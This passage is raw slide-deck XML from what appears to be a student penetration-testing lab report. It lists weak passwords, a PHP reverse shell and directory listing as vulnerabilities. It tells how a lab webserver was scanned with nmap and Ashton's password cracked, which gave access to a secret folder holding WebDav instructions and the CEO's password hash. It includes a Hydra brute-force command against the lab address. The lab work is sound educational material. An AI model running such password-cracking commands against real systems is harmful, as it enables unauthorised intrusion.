                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" b="1" dirty="0">
                        <a:latin typeface="Roboto"/>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100" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Using passwords that can be easily crack with a Brute Force Attack. Passwords should be complex, containing letters, numbers and/or symbols</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>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DBD9E8"/>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100" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>If an attacker can gain access to a username and their password is weak and can be cracked. An attacker can then gain access to the network and pivot to additional exploits.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="116956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b="1" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>PHP Reverse Shell</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" b="0" dirty="0">
                        <a:latin typeface="Roboto"/>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100" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Using social engineering techniques, an attacker can get the target to upload a crafted malicious file to create a reverse shell</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>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DBD9E8"/>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100" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>An interactive shell creates access for arbitrary command execution. With such access, they can try to elevate their privileges to obtain full control of the operating system</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>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30"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1131" name="Google Shape;1131;p63"/>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sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exposure of Information Through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p63"/>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133" name="Google Shape;1133;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="31542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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371500" cy="3154200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Navigated to webserver using the IP Address (192.168.1.105) gained from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> scan. Reviewed the company’s directory to get names of employees.  Cracked Ashton’s password, Using Hydra. Viewed the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>to get instructions to access webserver.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136" name="Google Shape;1136;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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01</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1137" name="Google Shape;1137;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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8" name="Google Shape;1138;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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1140" name="Google Shape;1140;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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41" name="Google Shape;1141;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="3154200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>I discovered that there was a secret folder. After using Hydra on Ashton and discovering his password, I was able to access the company’s secret folder and file: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>. This file contained instructions to access the company’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> and a hash for the CEO Ryan’s password, used later in the exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1144" name="Google Shape;1144;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621300"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC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03</a:t>
              </a:r>
              <a:endParaRPr sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1145" name="Google Shape;1145;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="634726" y="1885638"/>
              <a:ext cx="340325" cy="188625"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">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46" name="Google Shape;1146;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="2371500" cy="3252300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Screenshots of exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/share/wordlists/rockyou.txt -s 80 -f 192.168.1.105 http-get http://192.168.1.105/company_</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>folder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
